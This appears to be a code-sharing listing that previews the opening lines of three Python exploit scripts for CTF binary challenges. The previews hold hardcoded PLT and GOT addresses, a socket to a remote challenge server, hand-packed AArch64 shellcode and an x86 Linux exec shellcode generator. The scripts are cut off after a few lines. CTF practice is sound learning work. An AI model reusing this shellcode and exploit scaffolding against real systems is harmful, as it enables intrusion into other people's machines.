View xpl_rsbo.py
| #!/usr/bin/env python | |
| from struct import * | |
| from nulllife import * | |
| new_ebp = 0x0804a100 | |
| plt_read = 0x080483E0 | |
| plt_open = 0x08048420 | |
| plt_write = 0x08048450 | |
| flag_str = 0x080487D0 |
View xpl_ty_hitcon.py
| #!/usr/bin/env python | |
| from struct import * | |
| from nulllife import * | |
| s = NullSocket("210.71.253.109", 9123) | |
| #shell address is 0x411468 | |
| shellcode = struct.pack("<I", 0x90000000) #adrp x0, 0x411000 | |
| shellcode += struct.pack("<I", 0x91120000) #add x0, x0, #0x480 |
View xpl_callme.py
| #!/usr/bin/env python | |
| from nulllife import * | |
| import struct | |
| shellcode = NullShell(name = 'exec', arch = 'x86', os = 'linux').get() | |
| stack_chk_got = 0x0804A018 | |
| message_data = 0x0804A070 |
NewerOlder